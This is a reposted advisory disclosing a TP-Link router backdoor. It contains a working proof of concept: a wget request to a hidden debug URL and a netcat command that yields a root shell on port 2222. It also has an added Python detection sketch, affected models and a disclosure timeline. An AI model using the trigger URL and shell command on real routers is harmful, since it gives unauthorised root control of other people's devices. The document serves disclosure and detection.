About the TP-Link Router
The TP-Link TL-WDR4300 is a popular dual-band WiFi router in the SOHO class.
Tested Firmware
We tested the remote root PoC on the newest firmware (published on 25.12.2012):
TL-WDR4300 – tested firmware version
The following info is provided for educational use only! We are also not responsible for any potential damage to devices that are tested for this vulnerability.
Proof of Concept
root@secu:~# nc 192.168.0.1 2222
(UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
--2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
Connecting to 192.168.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: "start_art.html"
[ <=> ] 426 --.-K/s in 0s
2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]
root@secu:~# nc 192.168.0.1 2222
ps
PID  Uid   VmSize Stat Command
  1  root     404 S    init
  2  root         SW<  [kthreadd]
  3  root         SW<  [ksoftirqd/0]
  4  root         SW<  [events/0]
  5  root         SW<  [khelper]
  6  root         SW<  [async/mgr]
  7  root         SW<  [kblockd/0]
  8  root         SW   [pdflush]
  9  root         SW   [pdflush]
 10  root         SW<  [kswapd0]
 17  root         SW<  [mtdblockd]
 18  root         SW<  [unlzma/0]
 71  root    2768 S    /usr/bin/httpd
 76  root     380 S    /sbin/getty ttyS0 115200
 78  root     208 S    ipcserver
 82  root    2768 S    /usr/bin/httpd
 83  root    2768 S    /usr/bin/httpd
 86  root     732 S    ushare -d -x -f /tmp/ushare.conf
 92  root     348 S    syslogd -C -l 7
 96  root     292 S    klogd
101  root         SW<  [napt_ct_scan]
246  root     348 S    /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
247  root     204 S    /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
251  root     364 S    /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
286  root    2768 S    /usr/bin/httpd
299  root    2768 S    /usr/bin/httpd
300  root    2768 S    /usr/bin/httpd
305  root    2768 S    /usr/bin/httpd
307  root    2768 S    /usr/bin/httpd
309  root    2768 S    /usr/bin/httpd
310  root    2768 S    /usr/bin/httpd
389  root    2768 S    /usr/bin/httpd
Details
After the following HTTP request is sent:
http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html
the router downloads a file (nart.out) over TFTP from the host that issued the HTTP request and executes it as root:
PoC – diagram
Sample captures from the host which issues the http request:
Wireshark filter used to show router tftp traffic
nart.out tftp request
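A detection sketch for the sequence described above, added here as an example and not part of the original post: it parses TFTP read requests (RFC 1350) and pairs each HTTP hit on the debug page with a following nart.out fetch from the router to the requesting host. The function names, the event tuple layout and the 30-second window are assumptions, and the sample events are constructed.

```python
import struct

# Request path and file name as given on this page.
DEBUG_PATH = "/userRpmNatDebugRpm26525557/start_art.html"
PAYLOAD_NAME = "nart.out"
WINDOW_SECONDS = 30  # assumption: correlation window, tune for your network


def parse_tftp_rrq(payload: bytes):
    """Return (filename, mode) for a TFTP read request (opcode 1), else None."""
    if len(payload) < 4 or struct.unpack("!H", payload[:2])[0] != 1:
        return None
    parts = payload[2:].split(b"\x00")
    if len(parts) < 3 or not parts[0] or not parts[1]:
        return None  # malformed: filename and mode must both be NUL-terminated
    return parts[0].decode("ascii", "replace"), parts[1].decode("ascii", "replace").lower()


def find_backdoor_triggers(http_events, udp_events, router_ip):
    """http_events: (ts, src, dst, path); udp_events: (ts, src, dst, dport, payload)."""
    alerts = []
    for h_ts, h_src, h_dst, path in http_events:
        if h_dst != router_ip or path.split("?", 1)[0] != DEBUG_PATH:
            continue
        fetched = False
        for u_ts, u_src, u_dst, dport, payload in udp_events:
            rrq = parse_tftp_rrq(payload) if dport == 69 else None
            # The router must ask the same host that sent the HTTP request.
            if (rrq and rrq[0] == PAYLOAD_NAME and u_src == router_ip
                    and u_dst == h_src and 0 <= u_ts - h_ts <= WINDOW_SECONDS):
                fetched = True
        alerts.append({"requester": h_src, "time": h_ts, "tftp_fetch_seen": fetched})
    return alerts


# Constructed sample events (not the captures from the page).
ROUTER = "192.168.0.1"
SAMPLE_HTTP = [
    (100.0, "192.168.0.100", ROUTER, DEBUG_PATH),
    (200.0, "192.168.0.101", ROUTER, "/index.html"),
]
SAMPLE_UDP = [
    (101.2, ROUTER, "192.168.0.100", 69, b"\x00\x01nart.out\x00octet\x00"),
    (150.0, ROUTER, "192.168.0.100", 69, b"\x00\x02nart.out\x00octet\x00"),  # WRQ
]

if __name__ == "__main__":
    print(find_backdoor_triggers(SAMPLE_HTTP, SAMPLE_UDP, ROUTER))
```

An alert with tftp_fetch_seen set to False still records a request to the debug page, for example when a host firewall dropped the router's TFTP request.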
Models affected
TL-WDR4300
TL-WR743ND (v1.2 v2.0)
…
History of the bug
12.02.2013 – TP-Link e-mailed with details – no response
22.02.2013 – TP-Link again e-mailed with details – no response
12.03.2013 – public disclosure
More information
http://sekurak.pl/more-information-about-tp-link-backdoor/
– Michal Sajdak
from: http://sekurak.pl/tp-link-httptftp-backdoor/
Article source: lcx.cc: TP-Link http/tftp backdoor